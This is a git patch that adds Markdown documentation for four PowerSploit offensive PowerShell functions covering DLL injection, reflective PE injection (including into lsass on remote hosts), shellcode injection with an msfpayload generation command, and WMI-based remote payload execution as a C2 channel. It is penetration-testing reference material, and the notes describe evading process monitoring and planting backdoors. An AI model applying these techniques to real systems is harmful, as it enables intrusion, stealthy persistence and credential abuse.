From 1980f403ee78234eae4d93b50890d02f827a099f Mon Sep 17 00:00:00 2001 From: HarmJ0y Date: Wed, 14 Dec 2016 17:50:37 -0500 Subject: For ./CodeExecution/ : -PSScriptAnalyzering -Tweaking of synopsis blocks in order to support platyPS -Code standardization -Generated docs --- docs/CodeExecution/Invoke-DllInjection.md | 79 ++++++ docs/CodeExecution/Invoke-ReflectivePEInjection.md | 300 ++++++++++++++++++++ docs/CodeExecution/Invoke-Shellcode.md | 116 ++++++++ docs/CodeExecution/Invoke-WmiCommand.md | 311 +++++++++++++++++++++ 4 files changed, 806 insertions(+) create mode 100755 docs/CodeExecution/Invoke-DllInjection.md create mode 100755 docs/CodeExecution/Invoke-ReflectivePEInjection.md create mode 100755 docs/CodeExecution/Invoke-Shellcode.md create mode 100755 docs/CodeExecution/Invoke-WmiCommand.md (limited to 'docs/CodeExecution') diff --git a/docs/CodeExecution/Invoke-DllInjection.md b/docs/CodeExecution/Invoke-DllInjection.md new file mode 100755 index 0000000..d41bf31 --- /dev/null +++ b/docs/CodeExecution/Invoke-DllInjection.md @@ -0,0 +1,79 @@ +# Invoke-DllInjection + +## SYNOPSIS +Injects a Dll into the process ID of your choosing. + +PowerSploit Function: Invoke-DllInjection +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Invoke-DllInjection [-ProcessID] [-Dll] +``` + +## DESCRIPTION +Invoke-DllInjection injects a Dll into an arbitrary process. +It does this by using VirtualAllocEx to allocate memory the size of the +DLL in the remote process, writing the names of the DLL to load into the +remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread +to invoke LoadLibraryA in the context of the remote process. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-DllInjection -ProcessID 4274 -Dll evil.dll +``` + +Description +----------- +Inject 'evil.dll' into process ID 4274. + +## PARAMETERS + +### -ProcessID +Process ID of the process you want to inject a Dll into. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Dll +Name of the dll to inject. +This can be an absolute or relative path. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +Use the '-Verbose' option to print detailed information. + +## RELATED LINKS + +[http://www.exploit-monday.com](http://www.exploit-monday.com) + diff --git a/docs/CodeExecution/Invoke-ReflectivePEInjection.md b/docs/CodeExecution/Invoke-ReflectivePEInjection.md new file mode 100755 index 0000000..aee653d --- /dev/null +++ b/docs/CodeExecution/Invoke-ReflectivePEInjection.md @@ -0,0 +1,300 @@ +# Invoke-ReflectivePEInjection + +## SYNOPSIS +This script has two modes. +It can reflectively load a DLL/EXE in to the PowerShell process, +or it can reflectively load a DLL in to a remote process. +These modes have different parameters and constraints, +please lead the Notes section (GENERAL NOTES) for information on how to use them. + +1.)Reflectively loads a DLL or EXE in to memory of the Powershell process. +Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. + +This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, +this will load and execute the DLL/EXE in to memory without writing any files to disk. + +2.) Reflectively load a DLL in to memory of a remote process. +As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process. + +This is probably most useful for injecting backdoors in SYSTEM processes in Session0. +Currently, you cannot retrieve output +from the DLL. +The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the +remote process. + +PowerSploit Function: Invoke-ReflectivePEInjection +Author: Joe Bialek, Twitter: @JosephBialek +Code review and modifications: Matt Graeber, Twitter: @mattifestation +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Invoke-ReflectivePEInjection [-PEBytes] [[-ComputerName] ] [[-FuncReturnType] ] + [[-ExeArgs] ] [[-ProcId] ] [[-ProcName] ] [-ForceASLR] [-DoNotZeroMZ] +``` + +## DESCRIPTION +Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc(). +``` + +$PEBytes = \[IO.File\]::ReadAllBytes('DemoDLL.dll') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print +``` + +the wchar_t* returned by WStringFunc() from all the computers. +$PEBytes = \[IO.File\]::ReadAllBytes('DemoDLL.dll') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Load DemoEXE and run it locally. +``` + +$PEBytes = \[IO.File\]::ReadAllBytes('DemoEXE.exe') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Load DemoEXE and run it locally. Forces ASLR on for the EXE. +``` + +$PEBytes = \[IO.File\]::ReadAllBytes('DemoEXE.exe') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer. +``` + +$PEBytes = \[IO.File\]::ReadAllBytes('DemoDLL_RemoteProcess.dll') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local + +## PARAMETERS + +### -PEBytes +A byte array containing a DLL/EXE to load and execute. + +```yaml +Type: Byte[] +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerName +Optional, an array of computernames to run the script on. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FuncReturnType +Optional, the return type of the function being called in the DLL. +Default: Void + Options: String, WString, Void. +See notes for more information. + IMPORTANT: For DLLs being loaded remotely, only Void is supported. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: Void +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExeArgs +Optional, arguments to pass to the executable being reflectively loaded. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ProcId +Optional, the process ID of the remote process to inject the DLL in to. +If not injecting in to remote process, ignore this. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ProcName +Optional, the name of the remote process to inject the DLL in to. +If not injecting in to remote process, ignore this. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ForceASLR +Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR. +Some PE's will work with ASLR even + if the compiler flags don't indicate they support it. +Other PE's will simply crash. +Make sure to test this prior to using. +Has no effect when + loading in to a remote process. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DoNotZeroMZ +Optional, will not wipe the MZ from the first two bytes of the PE. +This is to be used primarily for testing purposes and to enable loading the same PE with Invoke-ReflectivePEInjection more than once. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +GENERAL NOTES: +The script has 3 basic sets of functionality: +1.) Reflectively load a DLL in to the PowerShell process + -Can return DLL output to user when run remotely or locally. + -Cleans up memory in the PS process once the DLL finishes executing. + -Great for running pentest tools on remote computers without triggering process monitoring alerts. + -By default, takes 3 function names, see below (DLL LOADING NOTES) for more info. +2.) Reflectively load an EXE in to the PowerShell process. + -Can NOT return EXE output to user when run remotely. +If remote output is needed, you must use a DLL. +CAN return EXE output if run locally. + -Cleans up memory in the PS process once the DLL finishes executing. + -Great for running existing pentest tools which are EXE's without triggering process monitoring alerts. +3.) Reflectively inject a DLL in to a remote process. + -Can NOT return DLL output to the user when run remotely OR locally. + -Does NOT clean up memory in the remote process if/when DLL finishes execution. + -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory. + -Expects the DLL to have this function: void VoidFunc(). +This is the function that will be called after the DLL is loaded. + +DLL LOADING NOTES: + +PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output. +If you need to get back the output from the PE file you are loading on remote computers, you must compile the PE file as a DLL, and have the DLL +return a char* or wchar_t*, which PowerShell can take and read the output from. +Anything output from stdout which is run using powershell +remoting will not be returned to you. +If you just run the PowerShell script locally, you WILL be able to see the stdout output from +applications because it will just appear in the console window. +The limitation only applies when using PowerShell remoting. + +For DLL Loading: +Once this script loads the DLL, it calls a function in the DLL. +There is a section near the bottom labeled "YOUR CODE GOES HERE" +I recommend your DLL take no parameters. +I have prewritten code to handle functions which take no parameters are return +the following types: char*, wchar_t*, and void. +If the function returns char* or wchar_t* the script will output the +returned data. +The FuncReturnType parameter can be used to specify which return type to use. +The mapping is as follows: +wchar_t* : FuncReturnType = WString +char* : FuncReturnType = String +void : Default, don't supply a FuncReturnType + +For the whcar_t* and char_t* options to work, you must allocate the string to the heap. +Don't simply convert a string +using string.c_str() because it will be allocaed on the stack and be destroyed when the DLL returns. + +The function name expected in the DLL for the prewritten FuncReturnType's is as follows: +WString : WStringFunc +String : StringFunc +Void : VoidFunc + +These function names ARE case sensitive. +To create an exported DLL function for the wstring type, the function would +be declared as follows: +extern "C" __declspec( dllexport ) wchar_t* WStringFunc() + + +If you want to use a DLL which returns a different data type, or which takes parameters, you will need to modify +this script to accomodate this. +You can find the code to modify in the section labeled "YOUR CODE GOES HERE". + +Find a DemoDLL at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectiveDllInjection + +## RELATED LINKS + +[http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/ + +Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/ +Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/](http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/ + +Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/ +Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/) + diff --git a/docs/CodeExecution/Invoke-Shellcode.md b/docs/CodeExecution/Invoke-Shellcode.md new file mode 100755 index 0000000..7240a4c --- /dev/null +++ b/docs/CodeExecution/Invoke-Shellcode.md @@ -0,0 +1,116 @@ +# Invoke-Shellcode + +## SYNOPSIS +Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process. + +PowerSploit Function: Invoke-Shellcode +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Invoke-Shellcode [-ProcessID ] [-Shellcode ] [-Force] +``` + +## DESCRIPTION +Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre + +PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. +To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk): + +msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/\[";\]//g;s/\\\\/,0/g' | tr -d '\n' | cut -c2- + +Make sure to specify 'thread' for your exit process. +Also, don't bother encoding your shellcode. +It's entirely unnecessary. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-Shellcode -ProcessId 4274 +``` + +Description +----------- +Inject shellcode into process ID 4274. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Invoke-Shellcode +``` + +Description +----------- +Inject shellcode into the running instance of PowerShell. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3) +``` + +Description +----------- +Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET) +Warning: This script has no way to validate that your shellcode is 32 vs. +64-bit! + +## PARAMETERS + +### -ProcessID +Process ID of the process you want to inject shellcode into. + +```yaml +Type: UInt16 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Shellcode +Specifies an optional shellcode passed in as a byte array + +```yaml +Type: Byte[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Force +Injects shellcode without prompting for confirmation. +By default, Invoke-Shellcode prompts for confirmation before performing any malicious act. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/CodeExecution/Invoke-WmiCommand.md b/docs/CodeExecution/Invoke-WmiCommand.md new file mode 100755 index 0000000..23e7d9e --- /dev/null +++ b/docs/CodeExecution/Invoke-WmiCommand.md @@ -0,0 +1,311 @@ +# Invoke-WmiCommand + +## SYNOPSIS +Executes a PowerShell ScriptBlock on a target computer using WMI as a +pure C2 channel. + +Author: Matthew Graeber +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Invoke-WmiCommand [-Payload] [[-RegistryHive] ] [[-RegistryKeyPath] ] + [[-RegistryPayloadValueName] ] [[-RegistryResultValueName] ] [[-ComputerName] ] + [[-Credential] ] [[-Impersonation] ] + [[-Authentication] ] [-EnableAllPrivileges] [[-Authority] ] +``` + +## DESCRIPTION +Invoke-WmiCommand executes a PowerShell ScriptBlock on a target +computer using WMI as a pure C2 channel. +It does this by using the +StdRegProv WMI registry provider methods to store a payload into a +registry value. +The command is then executed on the victim system and +the output is stored in another registry value that is then retrieved +remotely. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-WmiCommand -Payload { if ($True) { 'Do Evil' } } -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1' +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$Hosts = Get-Content hostnames.txt +``` + +PS C:\\\>$Payload = Get-Content payload.ps1 +PS C:\\\>$Credential = Get-Credential 'TargetDomain\TargetUser' +PS C:\\\>$Hosts | Invoke-WmiCommand -Payload $Payload -Credential $Credential + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$Payload = Get-Content payload.ps1 +``` + +PS C:\\\>Invoke-WmiCommand -Payload $Payload -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1', '10.10.1.2' + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Invoke-WmiCommand -Payload { 1+3+2+1+1 } -RegistryHive HKEY_LOCAL_MACHINE -RegistryKeyPath 'SOFTWARE\testkey' -RegistryPayloadValueName 'testvalue' -RegistryResultValueName 'testresult' -ComputerName '10.10.1.1' -Credential 'TargetHost\Administrator' -Verbose +``` + +## PARAMETERS + +### -Payload +Specifies the payload to be executed on the remote system. + +```yaml +Type: ScriptBlock +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RegistryHive +{{Fill RegistryHive Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: HKEY_CURRENT_USER +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RegistryKeyPath +Specifies the registry key where the payload and payload output will +be stored. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: SOFTWARE\Microsoft\Cryptography\RNG +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RegistryPayloadValueName +Specifies the registry value name where the payload will be stored. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: Seed +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RegistryResultValueName +Specifies the registry value name where the payload output will be +stored. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: Value +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerName +Runs the command on the specified computers. +The default is the local +computer. + +Type the NetBIOS name, an IP address, or a fully qualified domain +name of one or more computers. +To specify the local computer, type +the computer name, a dot (.), or "localhost". + +This parameter does not rely on Windows PowerShell remoting. +You can +use the ComputerName parameter even if your computer is not +configured to run remote commands. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Cn + +Required: False +Position: 6 +Default value: Localhost +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Credential +Specifies a user account that has permission to perform this action. +The default is the current user. +Type a user name, such as "User01", +"Domain01\User01", or User@Contoso.com. +Or, enter a PSCredential +object, such as an object that is returned by the Get-Credential +cmdlet. +When you type a user name, you will be prompted for a +password. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 7 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Impersonation +Specifies the impersonation level to use. +Valid values are: + +0: Default (Reads the local registry for the default impersonation level, which is usually set to "3: Impersonate".) + +1: Anonymous (Hides the credentials of the caller.) + +2: Identify (Allows objects to query the credentials of the caller.) + +3: Impersonate (Allows objects to use the credentials of the caller.) + +4: Delegate (Allows objects to permit other objects to use the credentials of the caller.) + +```yaml +Type: ImpersonationLevel +Parameter Sets: (All) +Aliases: +Accepted values: Default, Anonymous, Identify, Impersonate, Delegate + +Required: False +Position: 8 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Authentication +Specifies the authentication level to be used with the WMI connection. +Valid values are: + +-1: Unchanged + +0: Default + +1: None (No authentication in performed.) + +2: Connect (Authentication is performed only when the client establishes a relationship with the application.) + +3: Call (Authentication is performed only at the beginning of each call when the application receives the request.) + +4: Packet (Authentication is performed on all the data that is received from the client.) + +5: PacketIntegrity (All the data that is transferred between the client and the application is authenticated and verified.) + +6: PacketPrivacy (The properties of the other authentication levels are used, and all the data is encrypted.) + +```yaml +Type: AuthenticationLevel +Parameter Sets: (All) +Aliases: +Accepted values: Default, None, Connect, Call, Packet, PacketIntegrity, PacketPrivacy, Unchanged + +Required: False +Position: 9 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -EnableAllPrivileges +Enables all the privileges of the current user before the command +makes the WMI call. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Authority +Specifies the authority to use to authenticate the WMI connection. +You can specify standard NTLM or Kerberos authentication. +To use +NTLM, set the authority setting to ntlmdomain:\, where +\ identifies a valid NTLM domain name. +To use Kerberos, +specify kerberos:\. +You cannot include the +authority setting when you connect to the local computer. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 10 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### System.String[] + +Accepts one or more host names/IP addresses over the pipeline. + +## OUTPUTS + +### System.Management.Automation.PSObject + +Outputs a custom object consisting of the target computer name and +the output of the command executed. + +## NOTES +In order to receive the output from your payload, it must return +actual objects. +For example, Write-Host doesn't return objects +rather, it writes directly to the console. +If you're using +Write-Host in your scripts though, you probably don't deserve to get +the output of your payload back. +:P + +## RELATED LINKS + -- cgit v1.2.3